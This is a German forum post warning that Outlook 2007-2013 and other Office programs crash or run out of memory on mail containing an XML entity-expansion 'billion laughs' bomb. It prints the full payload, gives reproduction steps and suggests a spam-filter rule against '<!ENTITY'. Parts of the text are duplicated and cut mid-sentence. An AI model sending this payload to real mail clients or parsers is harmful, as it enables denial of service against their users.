0
Outlook 2007-2013 Anfälligkeit bei eintreffenden Plain-Text-Mails mit XML !ENTITY Inhalt
Die o.a. Outlook-Versionen sind von einem Bug betroffen wenn eine Mail z.B. folgenden Plain-Text Inhalt hat:
Auch bekannt als XML-Bomb
Wird solch eine Mail von Outlook empfangen und dargestellt kommt es reproduzierbar zum Absturz von Outlook bzw. zum Vollaufen des Arbeitsspeichers. Wenn Outlook so eingestellt ist das die Mail-Vorschau aktiv ist, hängt sich Outlook beim Neustart dann erneut in eine Schleife. Hier hilft dann nur das Starten von Outlook im Safe-Mode und Löschen der Mail.
Ihr könnt den Bug reproduzieren indem Ihr mal eine PlainText-Mail erstellt, und versucht obigen XML-Text dort einzufügen => Geschieht auf eigene Gefahr!
Andere Office-Applikationen wie z.B. Word sind ebenfalls betroffen, da sie den selben XML-Parser benutzen. Microsoft stuft den Bug mit niedriger Priorität ein, verspricht aber den Bug in zukünftigen Outlook-Versionen zu beheben.
Abhilfe kann man sich schaffen indem man seinen SPAM-Filter anweist Mails mit
Grüße @colinardo
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>Wird solch eine Mail von Outlook empfangen und dargestellt kommt es reproduzierbar zum Absturz von Outlook bzw. zum Vollaufen des Arbeitsspeichers. Wenn Outlook so eingestellt ist das die Mail-Vorschau aktiv ist, hängt sich Outlook beim Neustart dann erneut in eine Schleife. Hier hilft dann nur das Starten von Outlook im Safe-Mode und Löschen der Mail.
Ihr könnt den Bug reproduzieren indem Ihr mal eine PlainText-Mail erstellt, und versucht obigen XML-Text dort einzufügen => Geschieht auf eigene Gefahr!
Andere Office-Applikationen wie z.B. Word sind ebenfalls betroffen, da sie den selben XML-Parser benutzen. Microsoft stuft den Bug mit niedriger Priorität ein, verspricht aber den Bug in zukünftigen Outlook-Versionen zu beheben.
Abhilfe kann man sich schaffen indem man seinen SPAM-Filter anweist Mails mit
<!ENTITY Inhalt zu filtern.Grüße @colinardo
Share on Facebook
Share on Twitter
Share on Reddit
Share on LinkedinPlease also mark the comments that contributed to the solution of the article
Content-Key: 234559
Url: https://administrator.de/contentid/234559
Printed on: April 24, 2024 at 22:04 o'clock
